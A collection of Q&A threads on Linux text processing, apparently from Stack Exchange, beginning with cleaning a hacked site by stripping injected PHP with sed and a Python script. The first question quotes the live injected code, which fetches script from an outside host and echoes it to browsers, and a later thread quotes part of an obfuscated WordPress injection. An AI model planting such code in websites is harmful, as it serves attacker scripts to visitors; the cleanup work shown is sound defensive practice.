Find-and-replace multiple complex lines in Linux

I'm trying to clean up a security breach. I want to find all instances of the offending PHP code on the web directory and remove them. It looks like this:
<?php
#c9806e#
error_reporting(0); ini_set('display_errors',0); $wp_xoy23462 = #$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_xoy23462) && !preg_match ('/bot/i', $wp_xoy23462))){
$wp_xoy0923462="http://"."template"."class".".com/class"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_xoy23462);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_xoy0923462);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_23462xoy = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_23462xoy,1,3) === 'scr' ){ echo $wp_23462xoy; }
#/c9806e#
?>
<?php
?>
(c9806e is a random alphanumeric string)
I've found lots of resources for using find, sed, and grep to replace simple things. I could probably cobble something together from all that, but I wouldn't be sure that it works, or that it won't break anything.
Here are the tools I have:
GNU Awk 3.1.7
GNU grep 2.6.3
GNU sed 4.2.1
GNU find 4.4.2
Here's the offending code with escaped characters.
<\?php
#\w+#
error_reporting\(0\); ini_set\('display_errors',0\); $wp_xoy23462 = #$_SERVER\['HTTP_USER_AGENT'\];
if \(\( preg_match \('/Gecko\|MSIE/i', $wp_xoy23462\) && !preg_match \('/bot/i', $wp_xoy23462\)\)\)\{
$wp_xoy0923462="http://"\."template"\."class"\."\.com/class"\."/\?ip="\.$_SERVER\['REMOTE_ADDR'\]\."&referer="\.urlencode\($_SERVER\['HTTP_HOST'\]\)\."&ua="\.urlencode\($wp_xoy23462\);
$ch = curl_init\(\); curl_setopt \($ch, CURLOPT_URL,$wp_xoy0923462\);
curl_setopt \($ch, CURLOPT_TIMEOUT, 6\); curl_setopt\($ch, CURLOPT_RETURNTRANSFER, 1\); $wp_23462xoy = curl_exec \($ch\); curl_close\($ch\);\}
if \( substr\($wp_23462xoy,1,3\) === 'scr' \)\{ echo $wp_23462xoy; \}
#/\w+#
\?>
<\?php
\?>
Edit: As it turned out, some of the linebreaks were \r\n instead of \n. (Others were just '\n'.)

sed -n '1! H;1 h
$ {x
: again
\|<?php\n#\([[:alnum:]]\{1,\}\)#\nerror_reporting(0).*#/\1#\n?>\n<\?php\n\n\?>| s///
t again
p
}'
version that seems to work on GNU sed (thanks @leewangzhong)
sed -n '1! H;1 h
$ {x
: again
\|<?php\r*\n#\([[:alnum:]]\{6\}\)#\nerror_reporting(0).*#/\1#\r*\n?>\r*\n<?php\r*\n\r*\n?>| s///
t again
p
}'
Try something like this, but it really depends on the internal format of the code (\n, spaces, ...).
The concept:
load the whole file into the buffer (sed works line by line by default) so the pattern can match across \n
1! H;1 h
loads each line, as it is read, from the working buffer into the hold buffer
$ {x
at the last line ($), x swaps the hold buffer back into the working buffer, so sed now works on the full file, with a \n at the end of each original line
search for the bad block (from the opening <?php to the trailing empty <?php ?>) and remove it
if one was found, restart the operation (to catch the next block, which has a different random ID)
if none is left (so no more bad code), print the result (the cleaned file)
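For example, a minimal sketch of applying the GNU sed version above to a whole tree (assuming GNU sed's -i option; /var/www is a placeholder for your web root, and every .php file gets a .bak copy, clean or not):
find /var/www -type f -name '*.php' -exec sed -n -i.bak '
1! H;1 h
$ {x
: again
\|<?php\r*\n#\([[:alnum:]]\{6\}\)#\nerror_reporting(0).*#/\1#\r*\n?>\r*\n<?php\r*\n\r*\n?>| s///
t again
p
}' {} \;
Files that do not contain the pattern are rewritten unchanged, since the script prints the whole buffer either way.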

Using Python instead of sed for the replacement.
The regex:
<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>
The regex with comments:
<\?php                   #Start of PHP code (escape the '?')
\s+                      #Match any amount of whitespace
#(\w+)#\s+               #Hax header: one or more alphanumeric
                         #symbols; use parens to remember this group
error_reporting\(0\)     #To be really sure that this isn't innocent code,
                         #we check for turning off error reporting.
[^#]+                    #Match any characters until the next #, including
                         #newlines.
#/\1#\s+                 #Hax footer (using \1 to refer to the header code)
\?>                      #End of the PHP code
[^>]+>                   #Also catch the dummy <?php ?> that was added:
                         #match up to the next closing '>'
The Python script:
#Python 2.6
import re

haxpattern = r"<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>"
haxre = re.compile(haxpattern)

#Takes in two file paths.
#Writes the infile to the outfile, with the hax removed.
def unhax(input, output):
    with open(input) as infile:
        with open(output, 'w') as outfile:
            whole = infile.read()  #read the entire file, yes
            match = haxre.search(whole)
            if not match:
                #not found: copy the file through unchanged
                #(avoids leaving an empty output file)
                outfile.write(whole)
                return
            #output to file
            outfile.write(whole[:match.start()])  #before hax
            outfile.write(whole[match.end():])    #after hax
            #return the removed portion
            return match.group()

def process_and_backup(fname):
    backup = fname + '.bak2014'
    #move file to backup
    import os
    os.rename(fname, backup)
    try:
        #process
        print '--', fname, '--'
        print unhax(input=backup, output=fname)
    except Exception:
        #failed, undo move
        os.rename(backup, fname)
        raise

def main():
    import sys
    for arg in sys.argv[1:]:
        process_and_backup(arg)

if __name__ == '__main__':
    main()
The command:
find . -type f -name "*.php" -exec grep -l --null "wp_xoy0923462" {} \; | xargs -0 -I fname python unhaxphp.py fname >> unhax.out
The command, explained:
find #Find,
. #starting in the current folder,
-type f #files only (not directories)
-name "*.php" #which have names with extension .php
-exec grep #and execute grep on each file with these args:
-l #Print file names only (instead of matching lines)
--null #End prints with the NUL char instead of a newline
"wp_xoy0923462" #Look for this string
{} #on this file ("{}" is a placeholder that find fills in with each filename)
\; #(end of the -exec command)
| #Use the output from above as the stdin for this program:
xargs #Read from stdin, and for each string that ends
-0 #with a NUL char (instead of whitespace)
-I fname #replace "fname" with that string (instead of making a list of args)
#in the following command:
python #Run the Python script
unhaxphp.py #with this filename, and pass as argument:
fname #the filename of the .php file to unhax
>> unhax.out #and append stdout to this file instead of the console
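After the script has run, one way to review what was stripped out is to diff each cleaned file against the .bak2014 backup the script leaves behind (a hedged sketch using the backup suffix from the script above):
find . -type f -name '*.bak2014' -print0 | while IFS= read -r -d '' bak; do
    echo "== ${bak%.bak2014} =="
    diff "$bak" "${bak%.bak2014}"    # lines only in the backup are what was removed
done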

Related

How do I use perl-rename to replace . with _ on linux recursively, except for extensions

I am trying to rename some files and folders recursively to format the names, and figured find and perl-rename might be the tools for it. I've managed to find most of the commands I want to run, but for the last two:
I would like for every . in a directory name to be replaced by _ and
for every . but the last in a file name to be replaced with _
So that ./my.directory/my.file.extension becomes ./my_directory/my_file.extension.
For the second task, I don't even have a command.
For the first task, I have the following command:
find . -type d -depth -exec perl-rename -n "s/([^^])\./_/g" {} +
Which renames ./the_expanse/Season 1/The.Expanse.S01E01.1080p.WEB-DL.DD5.1.H264-RARBG to ./the_expanse/Season 1/Th_Expans_S01E0_1080_WEB-D_DD__H264-RARBG, so it doesn't work because the character before each . is eaten along with it.
If I instead type:
find . -type d -depth -exec perl-rename -n "s/\./_/g" {} +, it renames ./the_expanse/Season 1/The.Expanse.S01E01.1080p.WEB-DL.DD5.1.H264-RARBG into _/the_expanse/Season 1/The_Expanse_S01E01_1080p_WEB-DL_DD5_1_H264-RARBG, which doesn't work either because the leading . of the current directory is replaced by _.
If someone could give me a solution to:
replace every . in a directory name by _ and
replace every . but the last in a file name with _
I'd be very grateful.
First, tackling the directories with . in their names:
# find all directories and remove the './' part of each and save to a file
$ find -type d | perl -lpe 's#^(\./|\.)##g' > list-all-dir
#
# dry run
# just print the result without actual renaming
$ perl -lne '($old=$_) && s/\./_/g && print' list-all-dir
#
# if it looked fine, rename them
$ perl -lne '($old=$_) && s/\./_/g && rename($old,$_)' list-all-dir
This part s/\./_/g is for matching every . and replacing it with _
Second, tackling the files: replace every . except the one before the file extension.
# find all *.txt files and save the list (adjust the pattern to your match)
$ find -type f -name \*.txt | perl -lpe 's#^(\./|\.)##g' > list-all-file
#
# dry run
$ perl -lne '($old=$_) && s/(?:(?!\.txt$)\.)+/_/g && print ' list-all-file
#
# if it looked fine, rename them
$ perl -lne '($old=$_) && s/(?:(?!\.txt$)\.)+/_/g && rename($old,$_) ' list-all-file
This part (?:(?!\.txt$)\.)+ is for matching every . except the last . before the file extension.
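To see what that regex does (a quick illustration, not part of the original answer), feed it a sample path:
$ echo '/one.one/one.file.txt' | perl -pe 's/(?:(?!\.txt$)\.)+/_/g'
/one_one/one_file.txt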
NOTE
Here I used .txt; replace it with your own match. The second command will rename input like this:
/one.one/one.one/one.file.txt
/two.two/two.two/one.file.txt
/three.three/three.three/one.file.txt
to such an output:
/one_one/one_one/one_file.txt
/two_two/two_two/one_file.txt
/three_three/three_three/one_file.txt
and you can test the regex with an online regex tester.

sed- insert text before and after pattern

As part of an optimisation, I am trying to replace, in all my Java files, every line of the form:
logger.trace("some trace message");
With:
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
N.B. "some trace message" is not the exact string, just an example; it will be different for every instance.
I am using a bash script and sed but can't quite get the command right.
I have tried this in a bash script to insert before:
traceStmt="if (logger.isTraceEnabled())
{
"
find . -type f -name '*.java' | xargs sed "s?\(logger\.trace\)\(.*\)?\1${traceStmt}?g"
I have also tried different variants but with no success.
Try the following using GNU sed:
$ cat file1.java
1
2
logger.trace("some trace message");
4
5
$ find . -type f -name '*.java' | xargs sed 's?\(logger\.trace\)\(.*\)?if (logger.isTraceEnabled())\n{\n \1\2\n}?'
1
2
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
4
5
$
If you would like to prevent adding new line endings (sed will add a \n to the end of files that do not end in \n), you could try:
perl -pi -e 's/logger.trace\("some trace message"\);/`cat input`/e' file.java
notice the ending /e
The evaluation modifier s///e wraps an eval{...} around the replacement string, and the evaluated result is substituted for the matched substring.
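As a minimal illustration of /e (not from the original answer), the replacement is run as Perl code and its result is substituted:
$ echo "price: 5" | perl -pe 's/(\d+)/$1*2/e'
price: 10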
In this case from your example, the file input contains:
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
If you have multiple files, you could try:
find . -type f -name '*.java' -exec perl -pi -e 's/logger.trace\("some trace message"\);/`cat input`/e' {} +
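If you want a safety net, perl's -i switch accepts a backup suffix, so a hedged variant of the same command that keeps a copy of every modified file would be:
find . -type f -name '*.java' -exec perl -pi.bak -e 's/logger\.trace\("some trace message"\);/`cat input`/e' {} +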

Save result of find and md5sum commands into array for further processing

I need to save the result of a find + md5sum command for further processing inside a for loop. How do I save it into an array variable properly? Here is a part of my script with some test data:
IFS=\n
FILES_1=($(find ${DIR_1} -type f -exec md5sum {} + | sort -k 2))
i=0
for line in ${FILES_1[*]} ; do
echo ${line}
i=$(($i+1))
done
echo ${i} #just for check
Result:
d0c096a5b5d91ab188723713fd5e6357 test/dir1/dir/qwerty.py
e90d6e2e9e0e4554d902fe84b6e08604 test/dir1/dir/source.py
e98cf83497d25feea1e37274183744c3 test/dir1/file.txt
e5bd0a793460559be2e689d39ad9f037 test/dir1/file2.txt
222bec76ce8f3afc0b44ae409d2b03bf test/dir1/script1.py
bdd50254b0036bc6b7c136f335f1460e test/dir1/script2.py
eead78462722fce1e7e27a2ec69b78bd test/dir1/script3.py
7f609c0dd1490a5e8e4f69ddcdec6500 test/dir1/script4.py
3d4f2eb5d55096a02214e21701a472fa test/dir1/script5.py
So, after execution i = 1, not 9. And I can't access an element by index (i): I'm expecting to see one (the first) string if I write "echo ${FILES_1[0]}", but I see them all, and I see nothing for "echo ${FILES_1[1]}".
Seems like it's just one string. What am I doing wrong?
IFS=\n
This sets your input field separator to the literal letter n (the shell simply strips the backslash), not to a newline. Since newline is then not in IFS, and your input happens to contain no letter n, the whole output gets assigned to the first element of the array.
You want:
IFS=$'\n'
The $'...' construct expands escape sequences inside it to the corresponding characters; \n expands to an actual newline (hex 0x0a).
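A minimal sketch of the corrected assignment (same commands as in the question, only the IFS line changed; unsetting IFS afterwards restores normal word splitting):
IFS=$'\n'
FILES_1=($(find "${DIR_1}" -type f -exec md5sum {} + | sort -k 2))
echo "${#FILES_1[@]}"    # now one array element per output line, e.g. 9
unset IFS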
You can store each md5sum as the value of an associative array, with the file path as the key:
#!/usr/bin/env bash
declare -A arr
while IFS=' ' read -r -d '' v k; do   # v = checksum, k = file path; records are NUL-delimited
    arr[$k]="$v"
done < <(find . -type f -exec md5sum --zero {} +)   # --zero makes md5sum end each record with NUL
Then
echo "${arr["test/dir1/script1.py"]}"
Would print:
222bec76ce8f3afc0b44ae409d2b03bf
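To walk over all entries afterwards (a small sketch; associative arrays are unordered, so pipe through sort if you need a stable order):
for k in "${!arr[@]}"; do
    printf '%s  %s\n' "${arr[$k]}" "$k"
done | sort -k 2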
Try ((i=i+1)) instead of i=$(($i+1)) for the counter variable.
To populate an array, do this:
x=()
for element in ...; do    # whatever you are looping over
    x+=("$element")       # note: no spaces around +=
done

Replacing large string of text in Linux

I have several thousand WordPress files that were injected with a string such as the one shown below.
I know I can do a replace with something like this:
find . -type f -exec sed -i 's/foo/bar/g' {} +
But I am having a problem getting the large string quoted correctly. All the " and ' characters make the string break out of the quoting on my command line.
Below is a sample string:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\1162]y4c##j0#67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1pde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5cujojRk3%x5c%x7860{666~7878Bsfuvso!sboepn)%x5c%x7825epnbss-x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)p5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%xp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uc%x7825Z<#opo#>b%x5c%x7<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x70QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x!Ydrr)%x5c%x7825r%x5c%x%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5cq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!s%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x560msvd}+;!>!}%x5c%x7827;!>tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f2e:4e, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>
EXAMPLE of what I tried:
perl -pi -e 's/<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $rlapmcvfunction fjfgg($n){%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782c%x7824*!|!%x5c%x7824-...x2a\57\x20"; $qenzappyva=substr($rlapmcvoxs,(48535-38422),(59-47)); $qenzappyva($rrzeotjace, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>//g' /home/......../content-grid.php
-bash: !: event not found
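The "event not found" error itself comes from bash history expansion of the ! inside double quotes; as a hedged aside, history expansion can be switched off while you experiment, although quoting the rest of the payload is still the harder problem:
set +H    # disable history expansion in the current interactive shell
# ... run the perl command ...
set -H    # re-enable it afterwards if desired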
If the match is identical and on its own line, you can use comm:
comm -23 source subtract
where subtract is the file with the contents to be removed from the source file. It's not an in-place replacement, so you have to create a temp file and overwrite the source after making sure it does what you need.
If you don't care about the extra newline, the simple approach using sed would be:
find . -type f -exec sed -i 's/.*\\x61\\156\\x75\\156\\x61.*$//g' {} +
sed can also handle the newline, but that is a little more complex.
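For instance, a hedged variant (assuming the injected code always sits on one line of its own): the d command deletes the whole matching line, newline included, so no blank line is left behind:
find . -type f -exec sed -i '/\\x61\\156\\x75\\156\\x61/d' {} +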

Remove a null character (Shell Script)

I've looked everywhere and I'm out of luck.
I am trying to count the files in my current directory and all subdirectories, so that when I run the shell script count_files.sh it will produce output similar to:
$
2 sh
4 html
1 css
2 noexts
(EDIT the above output should have each count and extension on a newline)
$
where noexts are either files without any period as an extension (ex: fileName ) or files with a period but no extension (ex: fileName. ).
this pipeline:
find * | awk -F . '{print $NF}'
gives me a comprehensive list of all the files, and I've figured out how to remove files without any period (ex: fileName ) using sed '/\//d'
MY ISSUE is that I cannot remove, from the output of the above pipeline, the files that have a period but nothing after it (ex: fileName. ), since the field after the final delimiter '.' is empty.
How can I use sed like above to remove a null character from a pipe input?
I understand this could be a quick fix, but I've been googling like a madman with no luck. Thanks in advance.
Chip
To filter filenames that end with ., since filenames are the whole input line in find's output, you could use
sed '/\.$/d'
Where \. matches a literal dot and $ matches the end of the line.
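For example, a small sketch of plugging that filter into your existing pipeline (it has to run on find's output, before the extension is split off):
find * | sed '/\.$/d' | awk -F . '{print $NF}' | sed '/\//d'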
However, I think I'd do the whole thing in awk. Since sorting does not appear to be necessary:
EDIT: Found a nicer way to do it with awk and find's -printf action.
find . -type f -printf '%f\n' | awk -F. '!/\./ || $NF == "" { ++count["noext"]; next } { ++count[$NF] } END { for(k in count) { print count[k] " " k } }'
Here we pass -printf '%f\n' to find to make it print only the file name without the preceding directory, which makes it much easier to work with for our purposes -- this way there's no need to worry about periods in directory names (such as /etc/somethingorother.d). The field separator is '.'; the awk code is:
!/\./ || $NF == "" {   # if the line (the filename) does not contain
                       # a period, or there's nothing after the last .
    ++count["noext"]   # increment the "noext" counter
                       # note that this will be collated with files that
                       # have ".noext" as filename extension. see below.
    next               # go to the next line
}
{                      # in all other lines
    ++count[$NF]       # increment the counter for the file extension
}
END {                  # in the very end:
    for(k in count) {  # print the counters.
        print count[k] " " k
    }
}
Note that this way, if there is a file "foo.noext", it will be counted among the files without a filename extension. If this is a worry, use a special counter for files without an extension -- either apart from the array or with a key that cannot be a filename extension (such as one that includes a . or the empty string).
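Following that note, a hedged variant that counts extensionless files under a key containing a '.', which no real $NF can ever equal because '.' is the field separator:
find . -type f -printf '%f\n' | awk -F. '
    !/\./ || $NF == "" { ++count["no.ext"]; next }
    { ++count[$NF] }
    END { for (k in count) print count[k] " " k }'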
